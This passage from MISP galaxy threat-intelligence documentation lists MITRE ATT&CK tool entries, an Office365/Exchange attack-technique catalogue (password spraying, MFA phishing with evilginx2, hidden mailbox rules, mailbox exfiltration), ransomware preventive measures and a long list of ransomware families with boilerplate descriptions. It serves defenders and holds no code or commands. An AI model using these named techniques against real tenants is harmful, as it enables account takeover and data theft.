<td><a href="https://github.com/sensepost/notruler">https://github.com/sensepost/notruler</a></td>
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Nltest - S0359

[Nltest](https://attack.mitre.org/software/S0359) is a Windows command-line utility used to list domain controllers and enumerate domain trusts.(Citation: Nltest Manual)

The tag is: `misp-galaxy:mitre-tool="Nltest - S0359"`

Nltest - S0359 is also known as:

- Nltest

Nltest - S0359 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018"` with estimative-
Table 4969. Table References

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</tr>
<tr>
<td><a href="https://ss64.com/nt/nltest.html">https://ss64.com/nt/nltest.html</a></td>
</tr>
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**ShimRatReporter - S0445**

[ShimRatReporter](https://attack.mitre.org/software/S0445) is a tool used by suspected Chinese adversary [Mofang](https://attack.mitre.org/groups/G0103) to automatically conduct initial discovery. The details from this discovery are used to customize follow-on payloads (such as [ShimRat](https://attack.mitre.org/software/S0444)) as well as set up faux infrastructure which mimics the adversary's targets. [ShimRatReporter](https://attack.mitre.org/software/S0445) has been used in campaigns targeting multiple countries and sectors including government, military, critical infrastructure, automobile, and weapons development.(Citation: FOX-IT May 2016 Mofang)

The tag is: **misp-galaxy:mitre-tool="ShimRatReporter - S0445"**

ShimRatReporter - S0445 is also known as:

- ShimRatReporter

ShimRatReporter - S0445 has relationships with:

- uses: **misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"** with estimative-language:likelihood-probability="almost-certain"
- uses: **misp-galaxy:mitre-attack-pattern="Account Discovery - T1087"** with estimative-language:likelihood-probability="almost-certain"
- uses: **misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082"** with estimative-language:likelihood-probability="almost-certain"
- uses: **misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"** with estimative-language:likelihood-probability="almost-certain"
- uses: **misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005"** with estimative-language:likelihood-probability="almost-certain"
- uses: **misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020"** with estimative-language:likelihood-probability="almost-certain"
- uses: **misp-galaxy:mitre-attack-pattern="Automated Collection - T1119"** with estimative-
CARROTBALL - S0465

[CARROTBALL](https://attack.mitre.org/software/S0465) is an FTP downloader utility that has been in use since at least 2019. [CARROTBALL](https://attack.mitre.org/software/S0465) has been used as a downloader to install [SYSCON](https://attack.mitre.org/software/S0464).(Citation: Unit 42 CARROTBAT January 2020)

The tag is: `misp-galaxy:mitre-tool="CARROTBALL - S0465"`

CARROTBALL - S0465 is also known as:

- CARROTBALL

CARROTBALL - S0465 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with estimative-language:likelihood-probability="almost-certain"
CrackMapExec - S0488

[CrackMapExec](https://attack.mitre.org/software/S0488), or CME, is a post-exploitation tool developed in Python and designed for penetration testing against networks. [CrackMapExec](https://attack.mitre.org/software/S0488) collects Active Directory information to conduct lateral movement through targeted networks. (Citation: CME Github September 2018)

The tag is: `misp-galaxy:mitre-tool="CrackMapExec - S0488"`

CrackMapExec - S0488 is also known as:

- CrackMapExec

CrackMapExec - S0488 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Modify Registry - T1112"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="NTDS - T1003.003"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Password Guessing - T1110.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="At (Windows) - T1053.002"` with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Password Spraying - T1110.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Password Policy Discovery - T1201" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

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<tr>
<td><a href="https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference">https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference</a></td>
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</table>

**o365-exchange-techniques**

o365-exchange-techniques - Office365/Exchange related techniques by @johnLaT.

i

o365-exchange-techniques is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

**authors**

John Lambert - Alexandre Dulaunoy

**AAD - Dump users and groups with Azure AD**

AAD - Dump users and groups with Azure AD

The tag is: misp-galaxy:cloud-security="AAD - Dump users and groups with Azure AD"
O365 - Get Global Address List: MailSniper
The tag is: misp-galaxy:cloud-security="O365 - Get Global Address List: MailSniper"

O365 - Find Open Mailboxes: MailSniper
The tag is: misp-galaxy:cloud-security="O365 - Find Open Mailboxes: MailSniper"

O365 - User account enumeration with ActiveSync
The tag is: misp-galaxy:cloud-security="O365 - User account enumeration with ActiveSync"

End Point - Search host for Azure Credentials: SharpCloud
The tag is: misp-galaxy:cloud-security="End Point - Search host for Azure Credentials: SharpCloud"

On-Prem Exchange - Portal Recon
The tag is: misp-galaxy:cloud-security="On-Prem Exchange - Portal Recon"

On-Prem Exchange - Enumerate domain accounts: using Skype4B
The tag is: misp-galaxy:cloud-security="On-Prem Exchange - Enumerate domain accounts: using Skype4B"

On-Prem Exchange - Enumerate domain accounts: OWA & Exchange
The tag is: misp-galaxy:cloud-security="On-Prem Exchange - Enumerate domain accounts: OWA & Exchange"
On-Prem Exchange - Enumerate domain accounts: FindPeople

On-Prem Exchange - Enumerate domain accounts: FindPeople

The tag is: `misp-galaxy:cloud-security=“On-Prem Exchange - Enumerate domain accounts: FindPeople”`

On-Prem Exchange - OWA version discovery

On-Prem Exchange - OWA version discovery

The tag is: `misp-galaxy:cloud-security=“On-Prem Exchange - OWA version discovery”`

AAD - Password Spray: MailSniper

AAD - Password Spray: MailSniper

The tag is: `misp-galaxy:cloud-security=“AAD - Password Spray: MailSniper”`

AAD - Password Spray: CredKing

AAD - Password Spray: CredKing

The tag is: `misp-galaxy:cloud-security=“AAD - Password Spray: CredKing”`

O365 - Bruteforce of Autodiscover: SensePost Ruler

O365 - Bruteforce of Autodiscover: SensePost Ruler

The tag is: `misp-galaxy:cloud-security=“O365 - Bruteforce of Autodiscover: SensePost Ruler”`

O365 - Phishing for credentials

O365 - Phishing for credentials

The tag is: `misp-galaxy:cloud-security=“O365 - Phishing for credentials”`

O365 - Phishing using OAuth app

O365 - Phishing using OAuth app

The tag is: `misp-galaxy:cloud-security=“O365 - Phishing using OAuth app”`
O365 - 2FA MITM Phishing: evilginx2

O365 - 2FA MITM Phishing: evilginx2

The tag is: `misp-galaxy:cloud-security="O365 - 2FA MITM Phishing: evilginx2"`

On-Prem Exchange - Password Spray using Invoke-PasswordSprayOWA, EWS

On-Prem Exchange - Password Spray using Invoke-PasswordSprayOWA, EWS

The tag is: `misp-galaxy:cloud-security="On-Prem Exchange - Password Spray using Invoke-PasswordSprayOWA, EWS"`

On-Prem Exchange - Bruteforce of Autodiscover: SensePost Ruler

On-Prem Exchange - Bruteforce of Autodiscover: SensePost Ruler

The tag is: `misp-galaxy:cloud-security="On-Prem Exchange - Bruteforce of Autodiscover: SensePost Ruler"`

O365 - Add Mail forwarding rule

O365 - Add Mail forwarding rule

The tag is: `misp-galaxy:cloud-security="O365 - Add Mail forwarding rule"`

O365 - Add Global admin account

O365 - Add Global admin account

The tag is: `misp-galaxy:cloud-security="O365 - Add Global admin account"`

O365 - Delegate Tenant Admin

O365 - Delegate Tenant Admin

The tag is: `misp-galaxy:cloud-security="O365 - Delegate Tenant Admin"`

End Point - Persistence throught Outlook Home Page: SensePost Ruler

End Point - Persistence throught Outlook Home Page: SensePost Ruler

The tag is: `misp-galaxy:cloud-security="End Point - Persistence throught Outlook Home Page: SensePost Ruler"`
End Point - Persistence through custom Outlook form

End Point - Persistence through custom Outlook form

The tag is: *misp-galaxy:cloud-security="End Point - Persistence through custom Outlook form"

End Point - Create Hidden Mailbox Rule

End Point - Create Hidden Mailbox Rule

The tag is: *misp-galaxy:cloud-security="End Point - Create Hidden Mailbox Rule"

O365 - MailSniper: Search Mailbox for credentials

O365 - MailSniper: Search Mailbox for credentials

The tag is: *misp-galaxy:cloud-security="O365 - MailSniper: Search Mailbox for credentials"

O365 - Search for Content with eDiscovery

O365 - Search for Content with eDiscovery

The tag is: *misp-galaxy:cloud-security="O365 - Search for Content with eDiscovery"

O365 - Account Takeover: Add-MailboxPermission

O365 - Account Takeover: Add-MailboxPermission

The tag is: *misp-galaxy:cloud-security="O365 - Account Takeover: Add-MailboxPermission"

O365 - Pivot to On-Prem host: SensePost Ruler

O365 - Pivot to On-Prem host: SensePost Ruler

The tag is: *misp-galaxy:cloud-security="O365 - Pivot to On-Prem host: SensePost Ruler"

O365 - Exchange Tasks for C2: MWR

O365 - Exchange Tasks for C2: MWR

The tag is: *misp-galaxy:cloud-security="O365 - Exchange Tasks for C2: MWR"

O365 - Send Internal Email

O365 - Send Internal Email
On-Prem Exchange - Search Mailboxes with eDiscovery searches (EXO, Teams, SPO, OD4B, Skype4B)

On-Prem Exchange - Search Mailboxes with eDiscovery searches (EXO, Teams, SPO, OD4B, Skype4B)

The tag is: misp-galaxy:cloud-security="On-Prem Exchange - Search Mailboxes with eDiscovery searches (EXO, Teams, SPO, OD4B, Skype4B)"

On-Prem Exchange - Delegation

On-Prem Exchange - Delegation

The tag is: misp-galaxy:cloud-security="On-Prem Exchange - Delegation"

O365 - MailSniper: Search Mailbox for content

O365 - MailSniper: Search Mailbox for content

The tag is: misp-galaxy:cloud-security="O365 - MailSniper: Search Mailbox for content"

O365 - Exfiltration email using EWS APIs with PowerShell

O365 - Exfiltration email using EWS APIs with PowerShell

The tag is: misp-galaxy:cloud-security="O365 - Exfiltration email using EWS APIs with PowerShell"

O365 - Download documents and email

O365 - Download documents and email

The tag is: misp-galaxy:cloud-security="O365 - Download documents and email"

Preventive Measure

Preventive measures based on the ransomware document overview as published in https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml# . The preventive measures are quite generic and can fit any standard Windows infrastructure and their security measures..
Preventive Measure is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.

**authors**
Various

## Backup and Restore Process

Make sure to have adequate backup processes on place and frequently test a restore of these backups. (Schrödinger's backup - it is both existent and non-existent until you've tried a restore)

The tag is: `misp-galaxy:preventive-measure="Backup and Restore Process"`

**Table 4973. Table References**

<table>
<thead>
<tr>
<th>Links</th>
</tr>
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<tbody>
<tr>
<td><a href="http://windows.microsoft.com/en-us/windows/back-up-restore-faq#1TC=windows-7">http://windows.microsoft.com/en-us/windows/back-up-restore-faq#1TC=windows-7</a></td>
</tr>
</tbody>
</table>

## Block Macros

Disable macros in Office files downloaded from the Internet. This can be configured to work in two different modes: A.) Open downloaded documents in 'Protected View' B.) Open downloaded documents and block all macros

The tag is: `misp-galaxy:preventive-measure="Block Macros"`

**Table 4974. Table References**

<table>
<thead>
<tr>
<th>Links</th>
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</table>

## Disable WSH

Disable Windows Script Host

The tag is: `misp-galaxy:preventive-measure="Disable WSH"`

**Table 4975. Table References**

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
</table>
Filter Attachments Level 1

Filter the following attachments on your mail gateway: .ade, .adp, .ani, .bas, .bat, .chm, .cmd, .com, .cpl, .crt, .exe, .hlp, .ht, .hta, .inf, .ins, .isp, .jar, .job, .js, .jse, .lnk, .mda, .mdb, .mdm, .mdz, .msc, .msi, .msp, .mst, .ocx, .pcd, .ps1, .reg, .scr, .sct, .shs, .svg, *.url, .vb, .vbe, .vbs, .wbk, .wsc, .ws, .wsf, .wsh, .exe, .pif, .pub

The tag is: `misp-galaxy:preventive-measure="Filter Attachments Level 1"`

Filter Attachments Level 2

Filter the following attachments on your mail gateway: (Filter expression of Level 1 plus) .doc, .xls, .rtf, .docm, .xlsm, .pamt

The tag is: `misp-galaxy:preventive-measure="Filter Attachments Level 2"`

Restrict program execution

Block all program executions from the %LocalAppData% and %AppData% folder

The tag is: `misp-galaxy:preventive-measure="Restrict program execution"`

Table 4976. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
<tbody>
<tr>
<td><a href="http://www.fatdex.net/php/2014/06/01/disable-exes-from-running-inside-any-user-appdata-directory-gpo/">http://www.fatdex.net/php/2014/06/01/disable-exes-from-running-inside-any-user-appdata-directory-gpo/</a></td>
</tr>
<tr>
<td><a href="http://www.thirdtier.net/ransomware-prevention-kit/">http://www.thirdtier.net/ransomware-prevention-kit/</a></td>
</tr>
</tbody>
</table>

Show File Extensions

Set the registry key "HideFileExt" to 0 in order to show all file extensions, even of known file types. This helps avoiding cloaking tricks that use double extensions. (e.g. "not_a_virus.pdf.exe")

The tag is: `misp-galaxy:preventive-measure="Show File Extensions"`

Table 4977. Table References

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<th>Links</th>
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</thead>
</table>

Enforce UAC Prompt

Enforce administrative users to confirm an action that requires elevated rights

The tag is: `misp-galaxy:preventive-measure="Enforce UAC Prompt"`

Table 4978. Table References
Remove Admin Privileges

Remove and restrict administrative rights whenever possible. Malware can only modify files that users have write access to.

The tag is: misp-galaxy:preventive-measure="Remove Admin Privileges"

Restrict Workstation Communication

Activate the Windows Firewall to restrict workstation to workstation communication

The tag is: misp-galaxy:preventive-measure="Restrict Workstation Communication"

Sandboxing Email Input

Using sandbox that opens email attachments and removes attachments based on behavior analysis

The tag is: misp-galaxy:preventive-measure="Sandboxing Email Input"

Execution Prevention

Software that allows to control the execution of processes - sometimes integrated in Antivirus software Free: AntiHook, ProcessGuard, System Safety Monitor

The tag is: misp-galaxy:preventive-measure="Execution Prevention"

Change Default "Open With" to Notepad

Force extensions primarily used for infections to open up in Notepad rather than Windows Script Host or Internet Explorer

The tag is: misp-galaxy:preventive-measure="Change Default "Open With" to Notepad"

File Screening

Server-side file screening with the help of File Server Resource Manager

The tag is: misp-galaxy:preventive-measure="File Screening"
Restrict program execution #2

Block program executions (AppLocker)

The tag is: `misp-galaxy:preventive-measure="Restrict program execution #2"`

EMET

Detect and block exploitation techniques

The tag is: `misp-galaxy:preventive-measure="EMET"`

Sysmon

Detect Ransomware in an early stage with new Sysmon 5 File/Registry monitoring

The tag is: `misp-galaxy:preventive-measure="Sysmon"`

Blacklist-phone-numbers

Filter the numbers at phone routing level including PABX

The tag is: `misp-galaxy:preventive-measure="Blacklist-phone-numbers"`
ACL

Restrict access to shares users should not be allowed to write to

The tag is: `misp-galaxy:preventive-measure="ACL"`

Packet filtering

Limit access to a service by network/packet filtering the access to

The tag is: `misp-galaxy:preventive-measure="Packet filtering"`

Ransomware

Ransomware galaxy based on https://docs.google.com/spreadsheets/d/1TWS238xacAtOfLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml and http://pastebin.com/raw/GHgpWjar.

Ransomware is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

authors

https://docs.google.com/spreadsheets/d/1TWS238xacAtOfLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml - http://pastebin.com/raw/GHgpWjar - MISP Project - https://id-ransomware.blogspot.com/2016/07/ransomware-list.html

Nhtnwcuf Ransomware (Fake)

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.
**CryptoJacky Ransomware**

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: `misp-galaxy:ransomware="CryptoJacky Ransomware"`

**Kaenlupuf Ransomware**

About: This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: `misp-galaxy:ransomware="Kaenlupuf Ransomware"`

**EnjeyCrypter Ransomware**

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: `misp-galaxy:ransomware="EnjeyCrypter Ransomware"`
Dangerous Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: `misp-galaxy:ransomware="Dangerous Ransomware"`

Table 4991. Table References

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<td><a href="https://id-ransomware.blogspot.co.il/2017/03/dangerous-ransomware.html">https://id-ransomware.blogspot.co.il/2017/03/dangerous-ransomware.html</a></td>
</tr>
</tbody>
</table>

Vortex Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: `misp-galaxy:ransomware="Vortex Ransomware"`

Vortex Ransomware is also known as:

- ḳ Throwable

Table 4992. Table References

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<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2017/03/vortex-ransomware.html">https://id-ransomware.blogspot.co.il/2017/03/vortex-ransomware.html</a></td>
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<tr>
<td><a href="https://twitter.com/struppigel/status/839778905091424260">https://twitter.com/struppigel/status/839778905091424260</a></td>
</tr>
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</table>

GC47 Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: `misp-galaxy:ransomware="GC47 Ransomware"`
RozaLocker Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: *misp-galaxy:ransomware=*"RozaLocker Ransomware"

RozaLocker Ransomware is also known as:

- Roza

CryptoMeister Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: *misp-galaxy:ransomware=*"CryptoMeister Ransomware"

GG Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Poses as Hewlett-Packard 2016

The tag is: *misp-galaxy:ransomware=*"GG Ransomware"
Project34 Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: `misp-galaxy:ransomware="Project34 Ransomware"`

PetrapWrap Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: `misp-galaxy:ransomware="Petrap Wrap Ransomware"`

Karmen Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. RaaS, baed on HiddenTear

The tag is: `misp-galaxy:ransomware="Karmen Ransomware"`
Revenge Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. CryptoMix / CryptFile2 Variant

The tag is: *misp-galaxy:ransomware=“Revenge Ransomware”*

Turkish FileEncryptor Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: *misp-galaxy:ransomware=“Turkish FileEncryptor Ransomware”*

Turkish FileEncryptor Ransomware is also known as:

* Fake CTB-Locker

Kirk Ransomware & Spock Decryptor

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam,
fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Payments in Monero

The tag is: misp-galaxy:ransomware="Kirk Ransomware & Spock Decryptor"

Kirk Ransomware & Spock Decryptor is also known as:

- Kirk & Spock Decryptor

Table 5002. Table References

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<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2017/03/kirkspock-ransomware.html">https://id-ransomware.blogspot.co.il/2017/03/kirkspock-ransomware.html</a></td>
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<td><a href="http://www.securityweek.com/star-trek-themed-kirk-ransomware-emerges">http://www.securityweek.com/star-trek-themed-kirk-ransomware-emerges</a></td>
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<td><a href="https://www.grahamcluley.com/kirk-ransomware-sports-star-trek-themed-decryptor-little-known-crypto-currency/">https://www.grahamcluley.com/kirk-ransomware-sports-star-trek-themed-decryptor-little-known-crypto-currency/</a></td>
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<td><a href="https://www.virustotal.com/en/file/39a2201a88f10d81b220c973737f0becedab2e73426ab9923880fb0fb990c5cc/analysis/">https://www.virustotal.com/en/file/39a2201a88f10d81b220c973737f0becedab2e73426ab9923880fb0fb990c5cc/analysis/</a></td>
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</table>

ZinoCrypt Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="ZinoCrypt Ransomware"

Table 5003. Table References

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<td><a href="https://id-ransomware.blogspot.co.il/2017/03/zinocrypt-ransomware.html">https://id-ransomware.blogspot.co.il/2017/03/zinocrypt-ransomware.html</a></td>
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<td><a href="https://twitter.com/demonslay335?lang=en">https://twitter.com/demonslay335?lang=en</a></td>
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<td><a href="https://twitter.com/malwrhunterteam/status/842781575410597894">https://twitter.com/malwrhunterteam/status/842781575410597894</a></td>
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</table>

Crptxxx Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam,
fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Uses @enigma0x3’s UAC bypass

The tag is: misp-galaxy:ransomware="Crptxxx Ransomware"

Table 5004. Table References

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<th>Links</th>
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<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2017/03/crptxxx-ransomware.html">https://id-ransomware.blogspot.co.il/2017/03/crptxxx-ransomware.html</a></td>
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<td><a href="https://twitter.com/malwrhunterteam/status/839467168760725508">https://twitter.com/malwrhunterteam/status/839467168760725508</a></td>
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</tbody>
</table>

MOTD Ransomware

About: This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="MOTD Ransomware"

Table 5005. Table References

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<td><a href="https://id-ransomware.blogspot.co.il/2017/03/motd-ransomware.html">https://id-ransomware.blogspot.co.il/2017/03/motd-ransomware.html</a></td>
</tr>
</tbody>
</table>

CryptoDevil Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="CryptoDevil Ransomware"

Table 5006. Table References

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</table>
FabSysCrypto Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Based on HiddenTear

The tag is: misp-galaxy:ransomware="FabSysCrypto Ransomware"

Table 5007. Table References

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<td><a href="https://id-ransomware.blogspot.co.il/2017/03/fabsyscrypto-ransomware.html">https://id-ransomware.blogspot.co.il/2017/03/fabsyscrypto-ransomware.html</a></td>
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<td><a href="https://twitter.com/struppigel/status/837565766073475072">https://twitter.com/struppigel/status/837565766073475072</a></td>
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</table>

Lock2017 Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Lock2017 Ransomware"

Table 5008. Table References

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<td><a href="https://id-ransomware.blogspot.co.il/2017/03/lock2017-ransomware.html">https://id-ransomware.blogspot.co.il/2017/03/lock2017-ransomware.html</a></td>
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</tbody>
</table>

RedAnts Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="RedAnts Ransomware"

Table 5009. Table References

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<td><a href="https://id-ransomware.blogspot.co.il/2017/03/redants-ransomware.html">https://id-ransomware.blogspot.co.il/2017/03/redants-ransomware.html</a></td>
</tr>
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</table>

ConsoleApplication1 Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office,
Open Office, pictures, videos, shared online files etc..

The tag is: *misp-galaxy:ransomware="ConsoleApplication1 Ransomware"

**Table 5010. Table References**

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</tr>
</tbody>
</table>

**KRider Ransomware**

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: *misp-galaxy:ransomware="KRider Ransomware"

**Table 5011. Table References**

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2017/03/krider-ransomware.html">https://id-ransomware.blogspot.co.il/2017/03/krider-ransomware.html</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/malwrhunterteam/status/836995570384453632">https://twitter.com/malwrhunterteam/status/836995570384453632</a></td>
</tr>
</tbody>
</table>

**CYR-Locker Ransomware (FAKE)**

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. The following note is what you get if you put in the wrong key code: [failed-key.jpg](https://3.bp.blogspot.com/-qsS0x-tHx00/WLM3kkKWKAI/AAAAAAAAEDg/Zhy3eYf-ek8fY5uM0yHs7E0fEFg2AXG-gCLcB/s1600/failed-key.jpg)

The tag is: *misp-galaxy:ransomware="CYR-Locker Ransomware (FAKE)"

**Table 5012. Table References**

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.co.il/search?updated-min=2017-01-01T00:00:00-08:00&amp;updated-max=2018-01-01T00:00:00-08:00&amp;max-results=50">https://id-ransomware.blogspot.co.il/search?updated-min=2017-01-01T00:00:00-08:00&amp;updated-max=2018-01-01T00:00:00-08:00&amp;max-results=50</a></td>
</tr>
</tbody>
</table>

**DotRansomware**

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
Unlock26 Ransomware

About: This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Unlock26 Ransomware"

PicklesRansomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc. Python Ransomware

PicklesRansomware is also known as:

- Pickles

Vanguard Ransomware

